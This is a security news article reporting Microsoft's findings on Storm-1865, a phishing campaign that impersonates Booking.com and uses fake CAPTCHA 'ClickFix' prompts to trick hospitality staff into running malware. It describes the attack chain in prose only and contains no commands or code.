A novel twist on social-engineering attacks is causing havoc for hospitality providers.The security research team at Microsoft said that a threat actor known as Storm-1865 is behind an ongoing phishing attack that impersonates travel site Booking.com. The targets are hospitality companies that most likely to be working with Booking.com directly.The targeted organizations are located in North America, Oceania, South and Southeast Asia, and Northern, Southern, Eastern, and Western Europe. The ultimate aim of the operation appears to be the theft of financial accounts and login credentials, according to analysis of the malware payloads.While targeted phishing attacks are nothing new, what stuck out to the Microsoft researcher team was the way in which the attackers are getting their malware onto the targeted machines.The threat actors use a technique known as “ClickFix.” In these type of attacks, the victim is presented with a fake error message pop-up or notification. The notification instructs the user to either visit a site or copy and paste a command that will lead to either an exploit or direct download of the malware package.Such attacks are often more successful than other common methods because not only do they catch the user off guard with a seemingly official notification from the operating system, but also allow the attack to be carried out in a way that can fly under the radar of many antimalware tools.“This need for user interaction could allow an attack to slip through conventional and automated security features,” the researchers explained.“In the case of this phishing campaign, the user is prompted to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the phishing page adds to the clipboard.”The phishing emails themselves take on a number of forms, though all present themselves as being from Booking.com and targeted at hospitality providers who are signed up to the site. Among the lures are notifications of bad reviews and account verification alerts.Upon clicking a link in the message, the target will then be redirected to a site which provides a fake pop-up. In this case, the window presents itself as a CAPTCHA test. The test instructs the victim to copy a string of text and execute with the Windows run command. At that point, the malware will be downloaded and executed.Microsoft said that while the Storm-1865 group has been active for roughly two years, the ClickFix technique is a first for this particular cybercrime outfit.“In 2023, Storm-1865 targeted hotel guests using Booking.com with similar social engineering techniques and malware. In 2024, Storm-1865 targeted buyers using e-commerce platforms with phishing messages leading to fraudulent payment webpages,” Microsoft noted.“The addition of ClickFix to this threat actor’s tactics, techniques, and procedures (TTPs) shows how Storm-1865 is evolving its attack chains to try to slip through conventional security measures against phishing and malware.”
‘ClickFix’ campaign targets hospitality firms with phishing attacks
